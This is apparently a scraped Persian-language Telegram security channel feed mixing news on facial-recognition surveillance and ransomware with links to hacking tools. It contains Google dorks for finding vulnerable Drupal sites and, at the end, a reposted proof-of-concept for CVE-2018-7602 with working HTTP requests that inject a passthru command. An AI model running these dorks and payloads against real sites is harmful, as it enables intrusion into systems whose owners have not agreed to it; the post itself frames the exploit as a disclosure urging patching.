امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
به گزارش فوربس، یک شرکت مخفی نظارتی که توسط یک اسراییلی تاسیس شده، از پنج سال پیش اقدام به ساخت یک دیتابیس تشخیص چهره بسیار بزرگ از تصاویر جمع آوری شده از فیسبوک، یوتیوب و وبسایتهای دیگر کرده است.
این یک هشدار برای فعالان حریم خصوصی است.
هسته تکنولوژی تشخیص چهره Face-Int نام دارد و الان در اختیار شرکت اسراییلی Verint می باشد.
شرکت فوق در سال ۲۰۱۷ با نام Terrogence فعالیت میکرد و هردوی این شرکتها جزو تامین کنندگان حکومت امریکا هستند که تکنولوژی های جاسوسی برای سازمان NSA فراهم می آورند.
دیتابیس وب سایت Terrogence شامل تصاویر پروفایل جمع آوری شده از فیسبوک، توییتر و انجمن های موجود و قبلی در کل جهان است. چهره ها از ۳۵ هزار ویدیو و عکس تروریستها در کمپ ها و حملاتشان جمع آوری شده است.


اطلاعات بیشتر:
https://www.forbes.com/sites/thomasbrewster/2018/04/16/huge-facebook-facial-recognition-database-built-by-ex-israeli-spies/#44163ac67f18


#news
#facebook
#israel
#usa
#surveillance


@sec_nerd
بروت فورس یوزرنیم و پسوردها بر روی سرور با استفاده از SMB

github.com/m4ll0k/SMBrute

#windows
#smb
#network
#bruteforce


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
شکست در سرقت ATM با متد خاص نفوذ!

(اخیرا دلیر مردانی از کشورمون با موفقیت این کار رو انجام دادن!)

#fun


@sec_nerd
ده گام به سوی امنیت سایبری


#infography

@sec_nerd
تکنولوژی تشخیص چهره (facial recognition) در چین به اوج خود رسید و پلیس این کشور موفق شد یک مضنون را در بین جمعیت ۶۰ هزار نفری یک کنسرت شناسایی کند!
پلیس اعلام کرد یک مجرم فراری ۳۱ ساله را در کنسرت Jacky Cheung شناسایی و دستگیر کرد.
دوربین های بخش بررسی بلیطها به تکنولوژی تشخیص چهره مجهز بودند و این فرد به خوبی توسط دوربین ها شناسایی شد.
چین در حال حاضر ۱۷۰ میلیون دوربین مداربسته دارد و ۴۰۰ میلیون دوربین دیگر نیز قرار است طی سه سال آینده به تعداد فعلی اضافه شوند.
اکثر این دوربین ها به هوش مصنوعی و تشخیص چهره مجهز هستند.


اطلاعات بیشتر:
https://www.hackread.com/police-locate-suspect-from-a-crowd-using-facial-recognition/


#facial_recognition
#china
#privacy


@sec_nerd
امنیت اطلاعات
اکسپلویت Drupal منتشر شد https://isc.sans.edu/diary.html #drupal #exploit #rce @sec_nerd
دورک های گوگل برای آسیب پذیری دروپال

inurl:"/user/register" "Powered by Drupal" -CAPTCHA -"Access denied"

inurl:"user/register?element_parents=account/mail"

inurl:"*drupal_ajax"

#drupal
#exploit
#rce


@sec_nerd
Pivoting through HTTP webshells with Tunna: SOCKS proxy webshells (ASP, PHP & JSP)

https://blog.secu.dk/blog/Tunnels_in_a_hard_filtered_network/

#pentest #proxy #pivoting #network


@sec_nerd
شهر آتلانتا 2.6 میلیون دلار برای رهایی از یک باج افزار با نام SamSam هزینه کرده است!
این باج افزار که به جان سیستم های شهرداری این شهر افتاده است ابتدا درخواست ۵۰ هزار دلار باج کرده بود که پس از مدتی، پورتال پرداخت باج از کار افتاد.
تا کنون برای بازگردانی اطلاعات $2,667,328 پرداخت شده است!

https://www.wired.com/story/atlanta-spent-26m-recover-from-ransomware-scare/


#ransom
#ransomware
#usa

@sec_nerd
وقتی دوربین مداربسته ضد آب هست اما ضد هک نیست!

https://www.exploit-db.com/exploits/39706/


#network
#iot
#ipcam
#cctv


@sec_nerd
بازی طراحی شده توسط CIA از حالت محرمانه خارج شد.
این بازی که برای آموزش تحلیلگران CIA ساخته شده بود به تازگی از طبقه بندی محرمانه خارج و برای عموم در دسترس قرار گرفت.
بازی به این شکل است که بیش از ۱۵۰ کارت داریم و هر بازیکن باید برای هر دور، ایده هایی را برای خروج از بحران پیشنهاد کند.
بحرانها از جنس سیاسی، نظامی، اقتصادی و سلاح و ... هستند.


اطلاعات بیشتر:
https://www.kickstarter.com/projects/mmasnick/cia-collect-it-all


#cia
#Usa
#agents


@sec_nerd
تست نفوذ در اندروید با ابزار Hijacker
Aircrack-ng, Airodump-ng, MDK3 و Reaver

https://github.com/chrisk44/Hijacker/releases

#android
#wifi
#pentest
#network

@sec_nerd
This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.

You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).


POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]

Retrieve the form_build_id from the response, and then triggering the exploit with :


POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]

This will display the result of the whoami command.

Patch your systems!
Blaklis


#drupal
#exploit
#rce

@sec_nerd